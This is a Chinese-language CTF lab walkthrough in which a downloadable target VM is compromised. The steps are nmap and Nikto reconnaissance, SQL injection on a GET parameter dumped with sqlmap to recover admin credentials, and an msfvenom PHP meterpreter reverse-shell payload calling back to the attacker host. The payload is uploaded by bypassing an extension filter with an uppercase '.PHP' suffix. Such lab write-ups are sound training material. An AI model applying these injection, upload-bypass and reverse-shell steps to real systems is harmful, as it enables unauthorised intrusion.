CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

靶机地址:
链接:https://pan.baidu.com/s/1MhYXwhaJ8u08-b-6fg4lXg
提取码:8520
 

准备环境:

vm下kali系统和靶机

kali:192.168.111.128

靶机:192.168.111.130

首先进行信息收集这里我们用到端口扫描之王-nmap

namp -sV 192.168.111.130 探测端口服务版本

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

由此我们得到开放了22和80端口 对应的服务分别是ssh和apache

然后我们再进一步探测 使用Nikto -host http://192.168.111.130 // 探测敏感信息

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

分析信息可以得到后台目录存在/admin/login  目录下

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

尝试弱口令登录后无果 继续寻找信息

使用owasp zap 找到存在sql注入

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

存在sql注入在http://192.168.111.130/cat.php?id=3

然后使用神器sqlmap跑一下 目的得到后台管理员账号和密码

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

此处不得不感叹sqlmap的强大 同样的注入点比我们手工效率要快很多

得到账号admin  密码:P4ssw0rd

 

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

然后我们可以登录后台发现可上传文件

是我们拿shell最简单的方式

由此我们可以想到可以使用msf的生成一个php木马文件来反弹shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.111.128 lport=4444 -f raw >shell.php

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

由此我们在桌面上生成了一个shell.php的文件

然后我们需要用到msfconsole

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

然后设置好我们需要设置的 LHOST(kali地址)和lport(监听端口之后)

进行反弹shell

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

然后我们exploit或者run就可以开启监听

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

然后把我们制作好的shell.php上传 发现不允许上传.php后缀文件

这里我们用最简单的大写绕过 改为shell.PHP

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

然后我们可以点击shell 如果没出错的话 kali里边是有反弹的

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

可以看到攻击成功 顺利拿到shell

CTF基本:SQL注入之get参数注入(附靶机下载链接永久有效)

整个测试很简单 但是 需要我们思路明确能清楚每一步的步骤和目的

此教程仅用于实验测试。